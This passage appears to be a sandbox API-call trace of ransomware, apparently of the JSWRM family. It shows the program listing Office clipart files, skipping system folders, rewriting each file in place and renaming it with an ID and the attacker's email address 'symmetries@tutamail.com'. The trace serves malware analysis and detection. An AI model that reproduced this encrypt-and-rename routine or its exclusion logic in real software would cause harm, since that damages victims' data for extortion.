MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0092.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.459] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf68f613, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf68f613, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf68f613, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02373_.WMF", cAlternateFileName="")) returned 1 [0092.459] lstrcmpiW (lpString1="NA02373_.WMF", lpString2=".") returned 1 [0092.459] lstrcmpiW (lpString1="NA02373_.WMF", lpString2="..") returned 1 [0092.459] lstrcmpiW (lpString1="NA02373_.WMF", lpString2="...") returned 1 [0092.459] lstrcmpiW (lpString1="NA02373_.WMF", lpString2="windows") returned -1 [0092.459] lstrcmpiW (lpString1="NA02373_.WMF", lpString2="recovery") returned -1 [0092.460] lstrcmpiW (lpString1="NA02373_.WMF", lpString2="perflogs") returned -1 [0092.460] lstrcmpiW (lpString1="NA02373_.WMF", lpString2="documents and settings") returned 1 [0092.460] lstrcmpiW (lpString1="NA02373_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.460] lstrcmpiW (lpString1="NA02373_.WMF", lpString2="system volume information") returned -1 [0092.460] lstrcmpiW (lpString1="NA02373_.WMF", lpString2="msocache") returned 1 [0092.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02373_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02373_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02373_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02373_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02373_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02373_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0092.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02373_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.461] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3308) returned 1 [0092.461] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xce0) returned 0x23fc98 [0092.461] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xce0, lpOverlapped=0x0) returned 1 [0092.463] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.463] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xce0, lpOverlapped=0x0) returned 1 [0092.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.463] CloseHandle (hObject=0x314) returned 1 [0092.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0092.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0092.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0092.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0092.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0092.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.463] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02373_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02373_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0092.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.464] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02384_.WMF", cAlternateFileName="")) returned 1 [0092.464] lstrcmpiW (lpString1="NA02384_.WMF", lpString2=".") returned 1 [0092.464] lstrcmpiW (lpString1="NA02384_.WMF", lpString2="..") returned 1 [0092.464] lstrcmpiW (lpString1="NA02384_.WMF", lpString2="...") returned 1 [0092.464] lstrcmpiW (lpString1="NA02384_.WMF", lpString2="windows") returned -1 [0092.464] lstrcmpiW (lpString1="NA02384_.WMF", lpString2="recovery") returned -1 [0092.464] lstrcmpiW (lpString1="NA02384_.WMF", lpString2="perflogs") returned -1 [0092.464] lstrcmpiW (lpString1="NA02384_.WMF", lpString2="documents and settings") returned 1 [0092.464] lstrcmpiW (lpString1="NA02384_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.464] lstrcmpiW (lpString1="NA02384_.WMF", lpString2="system volume information") returned -1 [0092.465] lstrcmpiW (lpString1="NA02384_.WMF", lpString2="msocache") returned 1 [0092.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0092.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02384_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02384_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02384_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0092.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0092.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02384_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02384_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02384_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0092.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0092.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.465] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3032) returned 1 [0092.465] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbd0) returned 0x23fc98 [0092.465] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xbd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xbd0, lpOverlapped=0x0) returned 1 [0092.467] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.467] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xbd0, lpOverlapped=0x0) returned 1 [0092.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.467] CloseHandle (hObject=0x314) returned 1 [0092.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0092.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0092.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0092.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0092.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0092.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.468] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0092.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.468] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf68f613, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf68f613, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf68f613, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x948, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02386_.WMF", cAlternateFileName="")) returned 1 [0092.468] lstrcmpiW (lpString1="NA02386_.WMF", lpString2=".") returned 1 [0092.468] lstrcmpiW (lpString1="NA02386_.WMF", lpString2="..") returned 1 [0092.468] lstrcmpiW (lpString1="NA02386_.WMF", lpString2="...") returned 1 [0092.469] lstrcmpiW (lpString1="NA02386_.WMF", lpString2="windows") returned -1 [0092.469] lstrcmpiW (lpString1="NA02386_.WMF", lpString2="recovery") returned -1 [0092.469] lstrcmpiW (lpString1="NA02386_.WMF", lpString2="perflogs") returned -1 [0092.469] lstrcmpiW (lpString1="NA02386_.WMF", lpString2="documents and settings") returned 1 [0092.469] lstrcmpiW (lpString1="NA02386_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.469] lstrcmpiW (lpString1="NA02386_.WMF", lpString2="system volume information") returned -1 [0092.469] lstrcmpiW (lpString1="NA02386_.WMF", lpString2="msocache") returned 1 [0092.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0092.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02386_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02386_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02386_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0092.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0092.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02386_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02386_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02386_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0092.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0092.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.470] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2376) returned 1 [0092.470] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x940) returned 0x20c6c0 [0092.470] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x940, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x940, lpOverlapped=0x0) returned 1 [0092.471] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.471] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x940, lpOverlapped=0x0) returned 1 [0092.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0092.472] CloseHandle (hObject=0x314) returned 1 [0092.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0092.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0092.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0092.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0092.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0092.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.472] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0092.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.473] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc84, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02388_.WMF", cAlternateFileName="")) returned 1 [0092.473] lstrcmpiW (lpString1="NA02388_.WMF", lpString2=".") returned 1 [0092.473] lstrcmpiW (lpString1="NA02388_.WMF", lpString2="..") returned 1 [0092.473] lstrcmpiW (lpString1="NA02388_.WMF", lpString2="...") returned 1 [0092.473] lstrcmpiW (lpString1="NA02388_.WMF", lpString2="windows") returned -1 [0092.473] lstrcmpiW (lpString1="NA02388_.WMF", lpString2="recovery") returned -1 [0092.473] lstrcmpiW (lpString1="NA02388_.WMF", lpString2="perflogs") returned -1 [0092.473] lstrcmpiW (lpString1="NA02388_.WMF", lpString2="documents and settings") returned 1 [0092.473] lstrcmpiW (lpString1="NA02388_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.473] lstrcmpiW (lpString1="NA02388_.WMF", lpString2="system volume information") returned -1 [0092.473] lstrcmpiW (lpString1="NA02388_.WMF", 